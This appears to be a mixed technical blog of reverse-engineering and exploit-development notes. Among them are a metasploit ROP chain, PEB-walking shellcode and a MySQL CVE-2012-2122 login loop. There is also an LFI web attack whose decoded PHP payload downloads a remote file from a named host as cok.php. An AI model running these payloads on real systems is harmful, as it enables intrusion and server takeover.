29 June 2012
28 June 2012
String in memory
Suppose x is an array of char and *x = 'saya'; this means:
x[0] = 's' ; >> 0x73 << in python: hex(ord('s'))
x[1] = 'a' ; >> 0x61
x[2] = 'y' ; >> 0x79
x[3] = 'a' ; >> 0x61
In memory:
address | data |
0x904F000 | 73 |
0x904F001 | 61 |
0x904F002 | 79 |
0x904F003 | 61 |
Note: the data in memory is not reversed, unlike when the type is a dword or a word (previous article).
So if you call ReadProcessMemory
- at address 0x904F000
- for 4 bytes
- result >> 73 61 79 61, i.e. 0x73617961 read in address order (if you put the same 4 bytes into a DWORD buffer and print it as a number you get 0x61796173, because the little-endian rule applies again to the 4-byte type)
In this case there is no need to reverse the addresses (or anything related to LITTLE-ENDIAN) because a char is 1 byte.
How data is stored in memory
x = 0x12345678
Suppose x is a DWORD variable and the data of x is stored at address 0x904F000.
If you look in virtual memory (you can use Immunity Debugger or WinDbg), what is stored is reversed, i.e. 78 56 34 12,
or in more detail:
address | data |
0x904F000 | 78 |
0x904F001 | 56 |
0x904F002 | 34 |
0x904F003 | 12 |
When using the winapi ReadProcessMemory
Syntax
BOOL WINAPI ReadProcessMemory( __in HANDLE hProcess, __in LPCVOID lpBaseAddress, __out LPVOID lpBuffer, __in SIZE_T nSize, __out SIZE_T *lpNumberOfBytesRead );
Look at the 3rd parameter: lpBuffer is of type LPVOID, meaning you can pass a buffer of char, word, dword etc.
ReadProcessMemory(-1, 0x904f000, [array of dword], 4, 0)
result >>
dword[0] = 305419896 ; hex(dword[0]) gives back the value > 0x12345678
But if lpBuffer is a word array
ReadProcessMemory(-1, 0x904f000, [array of word], 4, 0)
result >>
word[0] = 22136 ; hex(word[0]) gives back the value > 0x5678 and
word[1] = 4660 ; hex(word[1]) gives back the value > 0x1234
SUMMARY:
word[0] is 2 bytes in size (takes data from 2 addresses),
so word[0] is taken from address 0x904F000 (0x78) and 0x904F001 (0x56),
but because this cpu is little endian, the addresses are read in reverse order:
0x904F001 (0x56)
0x904F000 (0x78) >> 0x5678
and word[1] takes its data from
0x904F003 (0x12) and
0x904F002 (0x34) >> 0x1234
Meanwhile
a dword is 4 bytes in size (takes data from 4 addresses), so dword[0] takes its data from
0x904F003 (0x12) and
0x904F002 (0x34) and
0x904F001 (0x56) and
0x904F000 (0x78) >> 0x12345678
What about char/byte??
hint: a char is 1 byte in size (takes data from 1 address).
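The three typed views of the same 4 bytes described above, together with the char case from the "String in memory" note, as an added example (not code from the original post). The sample memory is constructed inline from the values in the note; it stands in for what ReadProcessMemory would copy into a buffer of each type.

```python
import struct

# Constructed sample memory, not a real process dump: the 4 bytes that the post
# shows at 0x904F000 for DWORD x = 0x12345678, and the 4 bytes of the string "saya".
DWORD_BYTES = bytes([0x78, 0x56, 0x34, 0x12])
STRING_BYTES = b"saya"


def dump(base, mem):
    """[(address, byte)] pairs, one byte per address, like a debugger's hex view."""
    return [(base + i, b) for i, b in enumerate(mem)]


def as_dwords(mem):
    """View memory as little-endian 32-bit values (what a DWORD lpBuffer returns)."""
    count = len(mem) // 4
    return list(struct.unpack("<%dI" % count, mem[: count * 4]))


def as_words(mem):
    """View memory as little-endian 16-bit values (a WORD lpBuffer)."""
    count = len(mem) // 2
    return list(struct.unpack("<%dH" % count, mem[: count * 2]))


def as_bytes(mem):
    """View memory as 8-bit values (a char/BYTE lpBuffer): address order, no reordering."""
    return list(mem)


def views(mem):
    """All three views side by side, as hex strings."""
    return {
        "dword": [hex(v) for v in as_dwords(mem)],
        "word": [hex(v) for v in as_words(mem)],
        "byte": [hex(v) for v in as_bytes(mem)],
    }


if __name__ == "__main__":
    for addr, b in dump(0x904F000, DWORD_BYTES):
        print("%08x | %02x" % (addr, b))
    print(views(DWORD_BYTES))
    print(views(STRING_BYTES))
```

The `<` in each struct format string is the little-endian rule; swapping it for `>` shows what a big-endian CPU would return from the same bytes, which is the quickest way to convince yourself that the bytes themselves never change, only the grouping.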
26 June 2012
checking the IAT (import address table)
File: msvcr71.dll
ASLR: no
This DLL only imports functions from kernel32.dll.
PE_header.ImageBaseAddress = 7c340000 (in the Optional Header)
PE_header.ImportTableAddress = 49298 (rva) = 7c389298 (va)
Each IMAGE_IMPORT_DESCRIPTOR is 20 bytes:
[PE_header.ImportTableAddress + 0] = OFT (OriginalFirstThunk)
[PE_header.ImportTableAddress + 4] = TimeDateStamp
[PE_header.ImportTableAddress + 8] = ForwarderChain
[PE_header.ImportTableAddress + c] = NameRVA
[PE_header.ImportTableAddress + 10] = FT (FirstThunk)
1) OFT: read from 7c389298.
[7c389298] = 0492d0 (rva) = 7c3892d0 (va)
7c3892d0 is the start of an array of 4-byte entries, each an RVA to an IMAGE_IMPORT_BY_NAME: a 2-byte hint followed by the winAPI function name string.
index | Adr X | Content of X (rva) | ImageBase + rva = (va) | Content (va) = hint | Content (va + 2) = name |
0 | 7c3892d0 | 4953c | 7c38953c | 65 01 | GetModuleFileNameA |
1 | 7c3892d4 | 49552 | 7c389552 | 66 01 | GetModuleFileNameW |
2 | 7c3892d8 | 49568 | 7c389568 | AB 00 | ExitProcess |
50 | 7c389410 | 49af4 | 7c389af4 | 5b 03 | VirtualProtect |
(index 50 is hex: 7c3892d0 + 0x50*4 = 7c389410)
2) NameRVA: 7c3892a8
Pointer to the module name >> KERNEL32.dll
3) FT: 3A000 (va 7c37a000)
Pointer to the array that stores the winapi function addresses, i.e. the IAT proper, which the loader fills in. Its indices are in the same order as the OFT.
Example, to find the address of VirtualProtect:
Loop over the items in the OFT array;
if the name the entry points to = the function name,
save the index in eax (here 0x50);
the IAT slot is FT + eax*4 = 7c37a000 + 0x140 = 7c37a140, and jmp [7c37a140] calls VirtualProtect through the IAT.
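The walk above (descriptor, OFT, IMAGE_IMPORT_BY_NAME, FT slot) as an added example that parses a constructed import directory, not msvcr71.dll itself; it is not code from the original post. The image base is the one from the note, but the RVAs of the descriptor, thunk arrays, names and module string are arbitrary choices for this example. The parser goes slightly beyond the note: it also handles imports by ordinal and the case where a linker leaves OFT empty.

```python
import struct

IMAGE_BASE = 0x7C340000      # ImageBase of msvcr71.dll from the note; everything below is constructed
IMPORT_DIR_RVA = 0x1000      # assumed RVA of the import directory in this constructed image
DESCRIPTOR_SIZE = 20         # sizeof(IMAGE_IMPORT_DESCRIPTOR)


def build_image():
    """Construct a minimal image with one IMAGE_IMPORT_DESCRIPTOR for KERNEL32.dll.
    Layout (assumed RVAs):
      0x1000 import descriptor, followed by the all-zero terminator descriptor
      0x1100 OriginalFirstThunk (OFT): RVAs of IMAGE_IMPORT_BY_NAME entries
      0x1200 FirstThunk (FT): the IAT, which the loader overwrites with addresses
      0x1300 IMAGE_IMPORT_BY_NAME entries: WORD hint + NUL-terminated name
      0x1400 module name string
    Hints are the ones the note lists for these four functions."""
    img = bytearray(0x1500)
    names = [(0x0165, b"GetModuleFileNameA"), (0x0166, b"GetModuleFileNameW"),
             (0x00AB, b"ExitProcess"), (0x035B, b"VirtualProtect")]
    oft, ft, cursor = 0x1100, 0x1200, 0x1300
    for i, (hint, name) in enumerate(names):
        struct.pack_into("<H", img, cursor, hint)
        img[cursor + 2: cursor + 2 + len(name) + 1] = name + b"\0"
        struct.pack_into("<I", img, oft + 4 * i, cursor)
        struct.pack_into("<I", img, ft + 4 * i, cursor)   # before loading, the IAT mirrors the OFT
        cursor += 2 + len(name) + 1
        cursor += cursor & 1                              # keep entries WORD-aligned
    img[0x1400: 0x1400 + 13] = b"KERNEL32.dll\0"
    struct.pack_into("<IIIII", img, IMPORT_DIR_RVA, oft, 0, 0, 0x1400, ft)
    return bytes(img)


def read_cstr(img, rva):
    return img[rva: img.index(b"\0", rva)].decode("ascii")


def parse_imports(img, import_dir_rva, image_base):
    """Walk the import descriptors; return {module: {name: (hint, VA of its IAT slot)}}.
    Ordinal imports (high bit set in the thunk) are keyed as 'ordinal#N' with hint None."""
    result = {}
    off = import_dir_rva
    while True:
        oft, _stamp, _fwd, name_rva, ft = struct.unpack_from("<IIIII", img, off)
        if oft == 0 and name_rva == 0 and ft == 0:      # terminator descriptor
            break
        lookup = oft or ft          # some linkers leave OFT empty; the IAT then carries the names
        entries = {}
        i = 0
        while True:
            thunk, = struct.unpack_from("<I", img, lookup + 4 * i)
            if thunk == 0:
                break
            if thunk & 0x80000000:
                key, hint = "ordinal#%d" % (thunk & 0xFFFF), None
            else:
                hint, = struct.unpack_from("<H", img, thunk)
                key = read_cstr(img, thunk + 2)
            entries[key] = (hint, image_base + ft + 4 * i)  # FT + index*4, same order as OFT
            i += 1
        result[read_cstr(img, name_rva)] = entries
        off += DESCRIPTOR_SIZE
    return result


def iat_slot(img, function, import_dir_rva=IMPORT_DIR_RVA, image_base=IMAGE_BASE):
    """VA of the IAT slot that the loader fills with the address of `function`."""
    for entries in parse_imports(img, import_dir_rva, image_base).values():
        if function in entries:
            return entries[function][1]
    raise KeyError(function)


if __name__ == "__main__":
    image = build_image()
    for module, entries in parse_imports(image, IMPORT_DIR_RVA, IMAGE_BASE).items():
        print(module)
        for name, (hint, slot) in entries.items():
            print("  %-20s hint=%#06x  IAT slot=%#010x" % (name, hint, slot))
```

On a real file you would take the import directory RVA from the data directory in the optional header and map RVAs through the section table rather than indexing the raw file, but the descriptor and thunk logic is the same as here.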
22 June 2012
ROP using a "hard-coded address" (IAT)
metasploit: ms12-037
There are 2 rop implementations, one for xp sp3 and one for win7 sp1.
Referring to the rop for win7 sp1, which uses msvcr71.dll (jre-6 update-26):
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0x00001000, # (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0x00000040, # flNewProtect
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret '
The last 3 lines: 0x7c37a151 adjusted by 0x0EF is the location in the IAT of msvcr71.dll where the entry for VirtualProtect is stored. Note that ADD AL,0EF adds only to the low byte of EAX: 0x51 + 0xEF = 0x140, the carry is dropped, so EAX becomes 0x7c37a140 (not 0x7c37a240). That matches FT + 0x50*4 = 7c37a000 + 0x140 from the IAT note above. The data at that address is a pointer to kernel32.VirtualProtect, written there by the loader.
So even though hard-coded addresses are used to call VirtualProtect, this shellcode is still portable: the msvcr71.dll addresses are fixed because the DLL has no ASLR, while the address of kernel32.VirtualProtect, which differs between Windows versions and patch levels, is read out of the IAT at run time.
Kudos to metasploit for exposing this nice trick.
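To see exactly what the PUSHAD trick leaves on the stack for VirtualProtect, here is an added simulation of the chain above (not code from metasploit or from the original post). It models each gadget by the behaviour given in its comment and a dword-addressed stack; STACK_BASE is an assumed address for where the chain sits, and VirtualProtect itself is modelled only by its stdcall return (RET 0x10).

```python
# Gadget addresses are the win7 sp1 chain from the post; their behaviour is taken
# from the comments next to them. This simulates those semantics, it does not run
# msvcr71.dll code. STACK_BASE is an assumed stack address (constructed).
CHAIN = [
    0x7C37653D, 0x00001000, 0x7C347F98, 0x7C3415A2, 0xFFFFFFFF, 0x7C376402,
    0x7C345255, 0x7C352174, 0x7C344F87, 0x00000040, 0x7C34D201, 0x7C38B001,
    0x7C347F97, 0x7C37A151, 0x7C378C81, 0x7C345C30,
]
STACK_BASE = 0x0012F000
MASK = 0xFFFFFFFF


class Cpu:
    """Just enough x86 state for a ROP chain: 8 GPRs and a dword-addressed stack."""

    def __init__(self, stack_base, chain):
        self.r = dict(eax=0, ecx=0, edx=0, ebx=0, esp=stack_base, ebp=0, esi=0, edi=0)
        self.mem = {stack_base + 4 * i: v for i, v in enumerate(chain)}

    def pop(self):
        v = self.mem[self.r["esp"]]
        self.r["esp"] += 4
        return v

    def push(self, v):
        self.r["esp"] -= 4
        self.mem[self.r["esp"]] = v & MASK

    def arg(self, n):
        """n-th dword from ESP: 0 is the return address, 1.. are stdcall arguments."""
        return self.mem[self.r["esp"] + 4 * n]


def run_chain(chain=CHAIN, stack_base=STACK_BASE):
    """Drive the chain until 'push esp # ret'. Returns the VirtualProtect call frame
    as it exists at JMP [EAX], plus the address where execution finally lands."""
    cpu = Cpu(stack_base, chain)
    r = cpu.r
    frame = {}
    eip = cpu.pop()                       # the RETN that starts the chain
    while True:
        if eip == 0x7C37653D:             # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
            for reg in ("eax", "edi", "esi", "ebx", "ebp"):
                r[reg] = cpu.pop()
        elif eip == 0x7C347F98:           # RETN (ROP NOP)
            pass
        elif eip == 0x7C345255:           # INC EBX # FPATAN # RETN (FPATAN only touches the FPU)
            r["ebx"] = (r["ebx"] + 1) & MASK
        elif eip == 0x7C352174:           # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
            r["ebx"] = (r["ebx"] + r["eax"]) & MASK
            r["eax"] = 1
        elif eip == 0x7C344F87:           # POP EDX # RETN
            r["edx"] = cpu.pop()
        elif eip == 0x7C34D201:           # POP ECX # RETN
            r["ecx"] = cpu.pop()
        elif eip == 0x7C347F97:           # POP EAX # RETN
            r["eax"] = cpu.pop()
        elif eip == 0x7C378C81:           # PUSHAD # ADD AL,0EF # RETN
            esp_before = r["esp"]         # PUSHAD pushes the ESP value it started with
            for reg in ("eax", "ecx", "edx", "ebx"):
                cpu.push(r[reg])
            cpu.push(esp_before)
            for reg in ("ebp", "esi", "edi"):
                cpu.push(r[reg])
            al = (r["eax"] + 0xEF) & 0xFF  # 8-bit add: the carry out of AL is lost
            r["eax"] = (r["eax"] & 0xFFFFFF00) | al
        elif eip == 0x7C3415A2:           # JMP [EAX]: EAX must hold the IAT slot of VirtualProtect
            frame = dict(
                iat_slot=r["eax"],
                ret=cpu.arg(0),           # where VirtualProtect returns to
                lpAddress=cpu.arg(1),
                dwSize=cpu.arg(2),
                flNewProtect=cpu.arg(3),
                lpflOldProtect=cpu.arg(4),
            )
            eip = cpu.pop()               # VirtualProtect is stdcall: RET 0x10 ...
            r["esp"] += 0x10              # ... drops its four arguments
            continue
        elif eip == 0x7C376402:           # skip 4 bytes (ADD ESP,4 # RETN)
            r["esp"] += 4
        elif eip == 0x7C345C30:           # push esp # ret: execution lands at ESP
            frame["shellcode"] = r["esp"]
            return frame
        else:
            raise ValueError("unknown gadget %#x" % eip)
        eip = cpu.pop()                   # every other gadget ends in RETN


if __name__ == "__main__":
    for k, v in run_chain().items():
        print("%-15s %#010x" % (k, v))
```

The frame shows why the registers are set up the way they are: PUSHAD pushes EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI in that order, so after RETN pops EDI (the NOP) and ESI (JMP [EAX]), VirtualProtect sees EBP as its return address, the saved ESP as lpAddress, EBX as dwSize, EDX as flNewProtect and ECX as lpflOldProtect. The 8-bit add is what makes 0x7c37a140 come out of 0x7c37a151, and execution ends on the dword right after the chain.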
Direction of the qibla
Twice a year the sun is directly above the Kaaba:
1) 28 May 5:16pm
2) 16 July 5:28pm
At these times the direction of the qibla lines up with the shadows.
ref: http://www.falak-online.net/download/istiwamataharikaabah.pdf
21 June 2012
what is a quantum computer
The use of entanglement between 2 entities is applied to the construction of computers.
What is entanglement
Entanglement:
for dummies:
I'm hungry for more:
Dimensions
4th Dimension:
4th dimension for dummies:
hit me some more:
Now you think you understand the third dimension? hmm, not quite.
19 June 2012
run a malicious DLL
$ rundll32.exe <dll>,<entrypoint>
$ rundll32.exe jahat.dll, Install
18 June 2012
xpra : remote gui
Run a gui program on a remote server. The advantage is that you can detach and re-attach later without killing the program.
on the server:
$ xpra start :7
$ DISPLAY=:7 firefox
on the client:
$ xpra attach ssh:10.0.0.1:7 ; # the firefox gui will appear on the client desktop
$ CTRL +C ; # to detach. firefox will not be killed. run xpra attach again to continue the session
others:
xpra list
xpra version
python binary
The following 2 lines are the same:
packed_data = binascii.unhexlify('0100000061620000cdcc2c40')
packed_data = '0100000061620000cdcc2c40'.decode('hex')
(The second form is Python 2 only; on Python 3 use bytes.fromhex('0100000061620000cdcc2c40'), which gives the same bytes as binascii.unhexlify.)
16 June 2012
find the image urls in a picasa album
How to get the image urls from a picasa album.
<?php
// Input
$user_name = "xxxx@gmail.com";
$picasa_album_id = "5726978903470698481"; // to find the album id, go to picasaweb, open the album, click rss.
// build feed URL
$feedURL = "https://picasaweb.google.com/data/feed/api/user/$user_name/albumid/$picasa_album_id";
// read feed into SimpleXML object
$sxml = simplexml_load_file($feedURL);
// walk the entries and rebuild each image url with the /s800/ size segment inserted before the file name
foreach ($sxml->entry as $entry) {
    $urlgambar = (string) $entry->content['src'];
    $path = explode('/', $urlgambar); // split() was removed in PHP 7; explode() does the same job here
    $s800gambar = $path[0].'//'.$path[2].'/'.$path[3].'/'.$path[4].'/'.$path[5].'/'.$path[6].'/s800/'.$path[7];
    print_r($path);
    print $s800gambar . "\n";
}
?>
15 June 2012
10.04 has no new upgrade
in 10.04 (ubuntu)
# do-release-upgrade
No new release found
Strange, 12.04 has been out for a while.
By default an LTS waits for the first point release (12.04.1).
But if you really can't wait,
do-release-upgrade -d
The developers suggest waiting for 12.04.1 though.
This is what the release notes say:
Upgrades from Ubuntu 10.04 LTS to 12.04 LTS do not work using the alternate CD or the server CD as a package repository. It is recommended that users running Ubuntu 10.04 LTS wait for the 12.04.1 LTS point release, scheduled for July, before upgrading. (988941)
http://askubuntu.com/questions/125392/why-is-no-new-release-found-when-upgrading-10-04-to-12-04-lts
unicode to shellcode
Commonly found in javascript:
%u16eb%u41b9%uf4de
These are unicode escapes, each 16 bits (2 bytes) in size.
Because x86 is little-endian, in virtual memory they appear as follows:
eb 16 b9 41 de f4
extra:
in memory, 1 location (address) holds 8 bits.
Example
- address 13df000 : eb
- address 13df001 : 16
- address 13df002 : b9
- address 13df003 : 41
- address 13df004 : de
- address 13df005 : f4
I used to wonder why %u16eb becomes [eb 16]. People said little-endian, so it has to be reversed. But then why isn't [eb] itself reversed into [be]? That is, instead of [eb 16], why not [be 61]?
It turns out little-endian only concerns the order of bytes across memory addresses. The 8 bits inside each address stay exactly as they are.
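The conversion described above, as an added example that is not code from the original post: it turns a %uXXXX string into the bytes as they land in memory (and back), and refuses malformed escapes, which catches exactly the kind of slip where a %u is written as a plain %. The sample string is the one quoted in the note.

```python
import re
import struct

# Constructed input: the escape string quoted in the post above.
SAMPLE = "%u16eb%u41b9%uf4de"

_TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def unescape_shellcode(s):
    """Decode %uXXXX (16-bit unicode escape, stored little-endian) and %XX (one byte)
    into the raw bytes as they land in memory. Anything that is not a well-formed
    escape raises ValueError, so a typo such as "%f4de" instead of "%uf4de" is caught."""
    out = bytearray()
    pos = 0
    for m in _TOKEN.finditer(s):
        if m.start() != pos:
            raise ValueError("unexpected text at offset %d: %r" % (pos, s[pos:m.start()]))
        if m.group(1) is not None:
            out += struct.pack("<H", int(m.group(1), 16))  # low byte goes to the lower address
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    if pos != len(s):
        raise ValueError("unexpected text at offset %d: %r" % (pos, s[pos:]))
    return bytes(out)


def escape_shellcode(data):
    """Inverse: raw bytes -> %uXXXX string, the form a JavaScript heap spray embeds.
    A trailing odd byte is emitted as %XX."""
    pairs = len(data) // 2
    parts = ["%%u%04x" % w for w in struct.unpack("<%dH" % pairs, data[: pairs * 2])]
    if len(data) % 2:
        parts.append("%%%02x" % data[-1])
    return "".join(parts)


def memory_dump(data, base):
    """One line per address, the way the note lists 13df000 : eb, 13df001 : 16, ..."""
    return ["%x : %02x" % (base + i, b) for i, b in enumerate(data)]


if __name__ == "__main__":
    raw = unescape_shellcode(SAMPLE)
    print(raw.hex())
    print("\n".join(memory_dump(raw, 0x13DF000)))
    print(escape_shellcode(raw))
```

When unescaping a real spray, decode with this rather than a JavaScript `unescape` followed by a text encoding: `unescape` produces UTF-16 code units, and any later conversion to UTF-8 will mangle bytes above 0x7f.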
loop x86
loop next:
Decrements ecx, then jumps to next if ecx is not 0:
ecx = ecx - 1
if ecx != 0
eip = next
13 June 2012
cld vs std
cld sets DF (direction flag) to 0
std sets DF to 1
DF determines whether ESI goes up or down for the 'lodsd' instruction (and likewise ESI/EDI for the other string instructions: stos, movs, scas, cmps)
mov esi, 40100 ; esi: 40100
cld ; DF: 0
lodsd ; esi: 40104
lodsd ; esi: 40108
std ; DF: 1
lodsd ; esi: 40104
lodsd ; esi: 40100
picasa image urls change
In picasaweb, album properties:
Every time you set the 'Limited, anyone with the link' permission on an album, all the direct links to every image in that album change.
So set Limited first, then get the direct links to each image.
If you change it to public and then back to Limited, you have to fetch the image urls again, because the previous direct-link urls no longer work. << What kind of feature is this???? Someone please tell the picasa developers.
URL before setting limited:
https://lh5.googleusercontent.com/-D07UBBrM11k/T2F41a9GbZI/AAAAAAAAHcw/1GC_mXllVJ8/s800/bahan.JPG
URL after setting to Limited:
https://lh5.googleusercontent.com/-D07UBBrM11k/T2F41a9GbZI/AAAAAAAAHc4/AXTkphgKDog/s800/bahan.JPG
Picasa Album Id
How to get the album ID from picasaweb:
Go to your PWA account and click on the album in question.
Click on the 'RSS' link to the right.
You should get something like the following:
picasaweb.google.com/data/feed/base/user/PWAusername/albumid/1234567890123456789?alt=rss&kind=photo&hl=en_US
Notice the long string of digits; that's your Album ID.
ref: earth net
12 June 2012
find kernel32.dll in virtual memory
TEB -> PEB -> kernel32
xor eax, eax ; why zero eax? (so that the next instruction can use an 8-bit displacement; mov eax, fs:[0x30] would put null bytes in the encoding)
mov eax, [fs:eax+0x30] ; eax = 7ffdf000 (PEB)
mov eax, [eax + 0x0c] ; eax = 774a7880 (PEB->Ldr)
mov esi, [eax + 0x1c] ; esi = 000b1bc0 (Ldr->InInitializationOrderModuleList.Flink: the first entry's links)
lodsd ; eax = 000b2000 (Flink: the second entry) ; esi = 000b1bc4
mov eax, [eax + 8] ; eax = 75600000 << location of kernel32.dll in va (DllBase sits 8 bytes past the InInitializationOrder links)
If you followed that,
1) what is the value at location 0x000b1bc4?
2) what is the value at location 0x000b2004?
ref: Practical Malware Analysis (p. 414)
1) 774a789c (the Blink of the first entry, pointing back at the list head inside PEB_LDR_DATA: 774a7880 + 0x1c)
2) 000b1bc0 (the Blink of the second entry, pointing back at the first entry)
Caveat: on Windows 7 and later KernelBase.dll sits between ntdll.dll and kernel32.dll in the initialization-order list, so shellcode that needs kernel32 should check each entry's BaseDllName instead of assuming the second entry.
KiServiceTable
KiServiceTable is not exported by the kernel.
The way to get it is via KeServiceDescriptorTable:
typedef struct ServiceDescriptorTable {
SDE ServiceDescriptor[4];
} SDT;
typedef struct ServiceDescriptorEntry {
PDWORD KiServiceTable;
PDWORD CounterTableBase;
DWORD ServiceLimit;
PBYTE ArgumentTable;
} SDE;
KeServiceDescriptorTable.ServiceDescriptor[0].KiServiceTable < pointer to KiServiceTable
KeServiceDescriptorTable.ServiceDescriptor[0].ServiceLimit < size of the KiServiceTable array
The other ServiceDescriptors are unused.
(KeServiceDescriptorTable.ServiceDescriptor[1], [2] and [3] are all unused. The win32k.sys GUI system calls are described by the separate KeServiceDescriptorTableShadow, whose second entry is filled in for GUI threads.)
ref: http://www.thehackademy.net/madchat/vxdevl/library/Defeating%20Kernel%20Native%20API%20Hookers%20by%20Direct%20KiServiceTable%20Restoration.pdf
System Call
There are 2 mechanisms.
1) INT 2E > old (Win 2000 and before; from XP on the fast path is sysenter via ntdll!KiFastSystemCall, with the same eax/edx convention)
ntdll!NtWriteFile:
77f8c552 mov eax, 0xed
77f8c557 lea edx, [esp+0x4]
77f8c55b int 2e
77f8c55d ret 0x24
eax: index into the KiServiceTable array (the system service number)
edx: pointer to the first parameter for the kernel-mode function
The interrupt makes the OS consult the IDT (interrupt descriptor table). Entry 2e points to the KiSystemService code in NTOSKRNL (kernel-mode).
KiSystemService indexes KiServiceTable by the value in eax.
In this example, because eax is 0xed, the kernel-mode NtWriteFile is called (ret 0x24 then pops its 9 dword arguments).
11 June 2012
awk
awk is hard to remember.
awk -F" " '$7 ~ /\=http/ {print $1, $2, $7}'
One more:
awk '{if ($8 >= 2*$9) {print $0;}}' input.cif > output.cif
Even a computer can melt
If you sweet-talk it enough times, even a computer gives in:
while true; do mysql -u root mysql --password=baha; done
(This is the CVE-2012-2122 MySQL authentication bypass: on affected builds a repeated login with an arbitrary password eventually succeeds; see the memcmp issue below.)
memcmp issue
/*
* CVE-2012-2122 checker
*
* You may get differing results with/without -m32
*
* Joshua J. Drake
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
int main(void) {
int one, two, ret;
time_t start = time(0);
time_t now;
srand(getpid()*start);
while (1) {
one = rand();
two = rand();
/* a memcmp that returns outside -128..127 is what breaks MySQL's (char) cast of the result */
ret = memcmp(&one, &two, sizeof(int));
if (ret < -128 || ret > 127)
break;
time(&now);
if (now - start > 10) {
printf("Not triggered in 10 seconds, *probably* not vulnerable..\n");
return 1;
}
}
printf("Vulnerable! memcmp returned: %d\n", ret);
return 0;
}
07 June 2012
cmp and test
cmp eax,4 >> eax - 4 (result discarded, only the flags are kept)
SF: sign flag. Set to 1 if the result of eax minus 4 is negative.
ZF: zero flag. Set to 1 if the result of eax minus 4 is 0.
OF: overflow flag. Set to 1 if the signed subtraction overflows; JG and JL decide on SF != OF, not on SF alone.
instruction | Zero Flag | Sign Flag | Overflow Flag | JG | JE | JL |
---|---|---|---|---|---|---|
mov eax, 3 ; cmp eax,4 | 0 | 1 | 0 | - | - | jump |
mov eax, 4 ; cmp eax,4 | 1 | 0 | 0 | - | jump | - |
mov eax, 5 ; cmp eax,4 | 0 | 0 | 0 | jump | - | - |
test eax,4 >> bitwise 'AND' between eax and 4, result discarded. Sets SF, ZF and PF from the result; CF and OF are always cleared.
instruction | Zero Flag | Sign Flag | Overflow Flag | JG | JE | JL |
---|---|---|---|---|---|---|
mov eax, 3 ; test eax,4 | 1 | 0 | 0 | - | jump | - |
mov eax, 4 ; test eax,4 | 0 | 0 | 0 | jump | - | - |
mov eax, 5 ; test eax,4 | 0 | 0 | 0 | jump | - | - |
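The flag rules behind the two tables, as an added example (not code from the original post). It computes ZF/SF/CF/OF for cmp and test on 32-bit operands and derives the jump decisions from them, which reproduces the rows above and also covers the case the tables cannot show: an operand like 0x80000000 where SF alone would give the wrong answer and signed (JG/JL) and unsigned (JA/JB) jumps disagree.

```python
MASK32 = 0xFFFFFFFF


def flags_after_cmp(a, b):
    """Flags as the CPU leaves them after CMP a, b (computes a - b, keeps only the flags)."""
    a &= MASK32
    b &= MASK32
    res = (a - b) & MASK32
    return {
        "ZF": int(res == 0),
        "SF": res >> 31,                           # sign bit of the 32-bit result
        "CF": int(a < b),                          # unsigned borrow
        "OF": ((a ^ b) & (a ^ res)) >> 31,         # signed overflow: operand signs differ and result sign != a's
    }


def flags_after_test(a, b):
    """Flags after TEST a, b (computes a & b, keeps only the flags). CF and OF are always cleared."""
    res = (a & b) & MASK32
    return {"ZF": int(res == 0), "SF": res >> 31, "CF": 0, "OF": 0}


def taken(f):
    """Which conditional jumps would be taken on these flags.
    JG/JGE/JL/JLE are the signed rules (SF compared with OF); JA/JB are the unsigned ones (CF)."""
    zf, sf, cf, of = f["ZF"], f["SF"], f["CF"], f["OF"]
    return {
        "JE": zf == 1,
        "JNE": zf == 0,
        "JG": zf == 0 and sf == of,
        "JGE": sf == of,
        "JL": sf != of,
        "JLE": zf == 1 or sf != of,
        "JA": cf == 0 and zf == 0,
        "JB": cf == 1,
    }


def table(op, values, imm=4):
    """Rows of (eax, ZF, SF, OF, jumps taken among JG/JE/JL) for 'op eax, imm', like the tables above."""
    flags = flags_after_cmp if op == "cmp" else flags_after_test
    rows = []
    for v in values:
        f = flags(v, imm)
        jumps = ",".join(j for j in ("JG", "JE", "JL") if taken(f)[j])
        rows.append((v, f["ZF"], f["SF"], f["OF"], jumps))
    return rows


if __name__ == "__main__":
    for op in ("cmp", "test"):
        print(op)
        for row in table(op, [3, 4, 5]):
            print("  eax=%d ZF=%d SF=%d OF=%d -> %s" % row)
    # where SF alone misleads: 0x80000000 is INT_MIN signed but a huge value unsigned
    f = flags_after_cmp(0x80000000, 1)
    print("cmp 0x80000000,1:", f, "JL:", taken(f)["JL"], "JA:", taken(f)["JA"])
```

This matters when reading disassembly of length or bounds checks: a `cmp` followed by `jg`/`jl` is a signed comparison, while `ja`/`jb` is unsigned, and a negative length passed into a signed check sails through where an unsigned one would have rejected it.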
06 June 2012
web attack
index.php?option=com_xxxxx&controller=..//..//..//..//..//..//..//..///proc/self/environ00
This will display the environment variables.
USER_AGENT is also shown in the environment (which is why the payloads below are delivered in the User-Agent header: the included file echoes them and PHP executes them).
payload 1:
eval (base64_decode('ZWNobyAiYzBsaSMiLnBocF91bmFtZSgpLiIjYzBsaSI7IGlmK EBjb3B5KCJodHRwOi8vd3d3LmdvbGZkci5jby5rci9iYnMvaWNvbi9meC50eHQiLCJjb2sucGhwIikpIHsgZWNobyAiU1VDQ0VTUyI7 IH0= '));
>>
echo "c0li#".php_uname()."#c0li"; if(@copy("http://www.golfdr.co.kr/bbs/icon/fx.txt","cok.php")) { echo "SUCCESS"; }
payload 2:
